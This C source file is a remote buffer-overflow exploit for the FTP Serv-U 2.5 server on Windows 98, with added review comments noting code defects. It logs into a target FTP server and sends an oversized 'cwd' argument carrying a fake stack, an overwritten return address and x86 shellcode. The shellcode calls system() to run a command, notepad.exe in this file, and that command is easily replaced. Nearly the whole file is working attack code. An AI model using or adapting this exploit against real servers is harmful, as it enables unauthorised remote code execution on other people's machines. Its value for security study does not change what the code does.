
  1. /*=============================================================================
  2.    FTP Serv-U Version 2.5 Exploit for Windows98
  3.    The Shadow Penguin Security (http://shadowpenguin.backsection.net)
  4.    Written by UNYUN (shadowpenguin@backsection.net)
  5.   =============================================================================
  6. */
  7. #include <stdio.h>
  8. #include <string.h>
  9. #include <netdb.h>
  10. #include <netinet/in.h>
  11. #include <sys/socket.h>
  12. #include <sys/types.h>
  13. #include <sys/time.h>
  14. #include <unistd.h>
  15.  
/* Constants used by main() when it assembles buf[]:
 *   BUFSIZE, MAXUSER, MAXPASS  -- sizes of the local char arrays;
 *   FTP_PORT                   -- TCP port passed to htons();
 *   RETADR, CODEOFS, FSTACKOFS -- byte offsets into buf[];
 *   EIP, FAKESTACK, NOP, JMPS, JMPOFS -- byte values stored at those
 *   offsets (the multi-byte ones are split by hand, low byte first). */
#define  BUFSIZE    9000
#define  FTP_PORT   21
#define  RETADR     164
#define  CODEOFS    200
#define  FSTACKOFS  174
#define  JMPOFS     6
#define  MAXUSER    100
#define  MAXPASS    100
#define  EIP        0xbff7a027
#define  FAKESTACK  0x80050101
#define  NOP        0x90
#define  JMPS       0xeb
  28.  
/* 200-byte array; the initializer fills the leading part and the remainder
 * is zero. main() appends cmdbuf to it in place with strcat() before copying
 * it into buf[], so the combined length must stay below 200 bytes including
 * the terminator (it does for the values in this file). */
unsigned char exploit_code[200]={
0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,
0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF,
0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7,
0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52,
0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28,
0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,
0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF,
0xFF,0x00};
/* Text appended to exploit_code by main() via strcat(). Declared unsigned
 * char, so passing it to the <string.h> functions mixes pointer signedness. */
unsigned char cmdbuf[200]="msvcrt.dll.system.exit.notepad.exe";
  41.  
  42.  
/*
 * Write the NUL-terminated command in packetbuf to sockfd, then read from
 * the socket until a chunk containing '\n' arrives or read() returns 0/-1.
 * packetbuf is overwritten with each chunk as it is read and is left holding
 * the last one; only the current chunk is scanned for the newline.
 *
 * NOTE(review): packetbuf is a pointer parameter, so sizeof(packetbuf) is
 * sizeof(char *), not the size of the caller's buffer -- every read() fetches
 * at most a few bytes and packetbuf[i] then writes one past that chunk (still
 * inside the caller's large array). A separate size parameter would be the
 * proper fix. The return value of write() is not checked.
 */
void    sendcmd(int sockfd,char *packetbuf)
{
        int     i;

        write(sockfd,packetbuf,strlen(packetbuf));
        /* sizeof(packetbuf) is the pointer size here -- see note above. */
        while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
            packetbuf[i]=0;
            if(strchr(packetbuf,'\n')!=NULL) break;
        }
}
  53.  
/*
 * Entry point. Connects to argv[1] on FTP_PORT, logs in with argv[2]/argv[3]
 * (or the built-in anonymous credentials when they are not given), and sends
 * a "cwd" command whose argument is the BUFSIZE-byte string assembled below.
 *
 * Defects visible in this block:
 *   - exit() is used without <stdlib.h>, and inet_addr() without
 *     <arpa/inet.h>; neither header is in the include list above.
 *   - buf[BUFSIZE]=0 writes one past the end of buf (declared buf[BUFSIZE]).
 *   - The socket()/connect() failure paths call exit(0), i.e. report success.
 *   - exploit_code is unsigned char[]; strcat()/strlen()/memcpy() on it mix
 *     pointer signedness.
 *   - inet_addr() failure is tested with == -1 rather than INADDR_NONE.
 */
int     main(int argc,char *argv[])
{
        struct hostent      *hs;
        struct sockaddr_in  cli;
        char                packetbuf[BUFSIZE+3000],buf[BUFSIZE];
        char                user[MAXUSER],pass[MAXPASS];
        int                 sockfd,i,fakestack,ip,ebp,ins;

        /* Credentials: bounded copies of argv[2]/argv[3] when both are
         * present, otherwise the fixed anonymous pair. ebp and ins are
         * declared above but never used. */
        if (argc<2){
            printf("usage\n %s HostName {[username] [password]}\n",argv[0]);
            exit(1);
        }else if (argc==4){
            strncpy(user,argv[2],MAXUSER-1); 
            strncpy(pass,argv[3],MAXPASS-1);
            user[MAXUSER-1]=0; pass[MAXPASS-1]=0;
        }else{
            strcpy(user,"anonymous");
            strcpy(pass,"hoge@hohoho.com");
        }
        /* Resolve argv[1]: dotted-quad first, gethostbyname() as fallback. */
        bzero(&cli, sizeof(cli));
        cli.sin_family = AF_INET;
        cli.sin_port = htons(FTP_PORT);
        if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){
            if ((hs=gethostbyname(argv[1]))==NULL){
                printf("Can not resolve specified host.\n");
                exit(1);
            }
            cli.sin_family = hs->h_addrtype;
            memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);
        }

        if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
            perror("socket");  exit(0);   /* exit(0) on failure -- see header */
        }

        if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
            perror("connect"); exit(0);   /* exit(0) on failure -- see header */
        }
        /* Consume the server greeting: read until a chunk contains '\n'.
         * Here sizeof(packetbuf) is the real array size, unlike in sendcmd(). */
        while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
            packetbuf[i]=0;
            if(strchr(packetbuf,'\n')!=NULL) break;
        }

        /* Build buf[]: append cmdbuf to exploit_code in place (both are
         * 200-byte arrays), fill buf with NOP, then overlay the constants
         * at the offsets defined at the top of the file. */
        strcat(exploit_code,cmdbuf);
        memset(buf,NOP,BUFSIZE);

        /* FAKESTACK repeated, low byte first, over buf[0 .. FSTACKOFS). */
        fakestack=FAKESTACK;
        for (i=0;i<FSTACKOFS;i+=4){
            buf[i  ]=fakestack&0xff;
            buf[i+1]=(fakestack>>8)&0xff;
            buf[i+2]=(fakestack>>16)&0xff;
            buf[i+3]=(fakestack>>24)&0xff;
        }
        /* EIP, low byte first, at buf[RETADR .. RETADR+3], then JMPS/JMPOFS. */
        ip=EIP;
        buf[RETADR  ]=ip&0xff;
        buf[RETADR+1]=(ip>>8)&0xff;
        buf[RETADR+2]=(ip>>16)&0xff;
        buf[RETADR+3]=(ip>>24)&0xff;
        buf[RETADR+4]=JMPS;
        buf[RETADR+5]=JMPOFS;
        /* The extended exploit_code at buf[CODEOFS ...]; no NUL is copied. */
        memcpy(buf+CODEOFS,exploit_code,strlen(exploit_code));
        /* None of the bytes written above is zero, so this terminator is
         * what bounds the "%s" below -- but index BUFSIZE is one past the
         * end of buf[BUFSIZE] (out-of-bounds write on the stack). */
        buf[BUFSIZE]=0;

        /* Log in, then send the cwd command carrying buf. packetbuf is
         * BUFSIZE+3000 bytes, so "cwd %s\r\n" with the 9000-byte buf fits. */
        sprintf(packetbuf,"user %s\r\n",user);
        sendcmd(sockfd,packetbuf);
        sprintf(packetbuf,"pass %s\r\n",pass);
        sendcmd(sockfd,packetbuf);
        sprintf(packetbuf,"cwd %s\r\n",buf);
        sendcmd(sockfd,packetbuf);

        close(sockfd);
}
  126.